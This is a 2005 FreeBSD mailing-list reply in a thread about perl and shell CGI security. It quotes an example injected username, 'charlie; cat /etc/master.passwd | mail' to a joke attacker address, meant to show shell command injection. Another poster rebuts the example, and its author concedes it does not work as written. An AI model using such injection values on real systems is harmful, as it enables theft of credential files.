From owner-freebsd-questions@FreeBSD.ORG Sat Feb 5 06:19:34 2005 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1EE316A4CE for ; Sat, 5 Feb 2005 06:19:33 +0000 (GMT) Received: from hosea.tallye.com (joel.tallye.com [216.99.199.78]) by mx1.FreeBSD.org (Postfix) with ESMTP id D635543D2D for ; Sat, 5 Feb 2005 06:19:32 +0000 (GMT) (envelope-from lorenl@alzatex.com) Received: from hosea.tallye.com (hosea.tallye.com [127.0.0.1]) by hosea.tallye.com (8.12.8/8.12.10) with ESMTP id j156JJGf017634 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Fri, 4 Feb 2005 22:19:19 -0800 Received: (from sttng359@localhost) by hosea.tallye.com (8.12.8/8.12.10/Submit) id j156JIDv017632; Fri, 4 Feb 2005 22:19:18 -0800 X-Authentication-Warning: hosea.tallye.com: sttng359 set sender to lorenl@alzatex.com using -f Date: Fri, 4 Feb 2005 22:19:18 -0800 From: "Loren M. Lang" To: Dan Nelson Message-ID: <20050205061918.GG8619@alzatex.com> References: <200501251530.06424.shinjii@virusinfo.rdksupportinc.com> <20050125055301.GB16896@xor.obsecurity.org> <20050125194736.GD76109@xor.obsecurity.org> <20050205034440.GF8619@alzatex.com> <20050205041344.GK25463@dan.emsphone.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20050205041344.GK25463@dan.emsphone.com> User-Agent: Mutt/1.4.1i X-GPG-Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc X-GPG-Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C cc: Paul Schmehl cc: "Donald J. O'Neill" cc: Warren cc: Gert Cuykens cc: "Loren M. Lang" cc: Kris Kennaway cc: freebsd-questions@freebsd.org Subject: Re: perl and ports X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 05 Feb 2005 06:19:34 -0000 On Fri, Feb 04, 2005 at 10:13:45PM -0600, Dan Nelson wrote: > In the last episode (Feb 04), Loren M. Lang said: > > Actually, I think you should work on sh first, it's a much bigger > > security hazard than perl. If you've ever written much sh, you'd > > realize with it's much loser syntax, it's easy to get into trouble. > > At least perl provides use strict and -Tw. Someone using sh to write > > cgi scripts is the worst. Imagine someone writing the following like > > for a sh cgi script where $USERNAME is a cgi paramater passed into > > the following script: > > > > echo "Welcome, " $USERNAME "" > > > > What if someone wrote the following username and apache was running as > > root: > > > > charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo > > Then you would get a web page containing: > > Welcome, charlie; cat /etc/master.passwd | mail haZ0rZ@deathtoyou.com; echo > > . The shell doesn't re-interpret its input unless explicitly told to > via the "eval" command. /bin/sh is a little limited for more complex > scripts due to its lack of arrays, though, so zsh/ksh/bash are much > better choices :) Well, my email was meant as a joke and I didn't bother to validate anything I wrote, I just remember reading something along these lines in a cgi book warning of the dangers of sh scripting for cgi scripts. The original example was more elaborate and probably did use eval, but my point is that sh can be more dangerous than perl since it uses a looser syntax. By not using "'s around $USERNAME, it will end up being parsed as multiple arguments which, for echo, isn't a big deal, but for most commands you can end up shooting your self in the foot. I definetly would not recommend removing it from the system or even recommend against using it for anything, but just pointing at the irony of considering perl a giant security hole. Mostly, I have just found this whole thread very humorous, and I wonder what the reaction of the developers will be when he trys asking them to stop using perl. > > -- > Dan Nelson > dnelson@allantgroup.com -- I sense much NT in you. NT leads to Bluescreen. Bluescreen leads to downtime. Downtime leads to suffering. NT is the path to the darkside. Powerful Unix is. Public Key: ftp://ftp.tallye.com/pub/lorenl_pubkey.asc Fingerprint: B3B9 D669 69C9 09EC 1BCD 835A FAF3 7A46 E4A3 280C